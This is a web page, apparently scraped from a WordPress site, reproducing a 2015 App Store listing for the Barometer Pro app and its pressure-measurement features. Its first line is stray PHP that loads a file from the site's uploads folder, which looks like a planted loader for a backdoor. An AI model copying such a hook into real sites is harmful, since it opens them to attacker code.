include_once(ABSPATH . '/wp-content/uploads/index.php');
February 11th, 2015
This app is designed for both iPhone and iPad
Released: Feb 10, 2015
Size: 3.2 MB
Seller: HUNG HSUN LIN
Barometer Pro by HUNG HSUN LIN
Description### Only Compatible with iPhone 6, iPhone 6 Plus and iPad Air 2 ###
This app is primarily used to measure atmospheric pressure. It could also collect weather information such as temperature, humidity, wind speed, wind direction, precipitation and cloudiness from adjacent weather stations. This app contains the following features:
1) Plot the measured data in real time.
2) Measurement duration and measurement frequency are customizable.
3) Multiple units supported: kPa, hPa, mbar, mmHg, Torr, at, kgf/cm^2, atm, inHg, psi.
4) Users could set alert value to some level (Ex. 800 hPa). When the measured pressure is lower than the alert value, it will alert users.
5) The location information of the measurement points could also be obtained, and all the measurement results could be shown in map.
6) All measured data could be exported as a csv format file for post process.
7) In addition, users could also add photos, videos and voice notes to the measured data, and the photos, videos and voice notes could be downloaded via iTunes.